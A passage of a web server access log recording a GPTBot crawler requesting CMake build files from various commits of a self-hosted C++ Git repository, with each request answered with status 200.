(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11235] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24299] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11200] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11199] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15124] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15273] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15273] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15271] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24303] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr 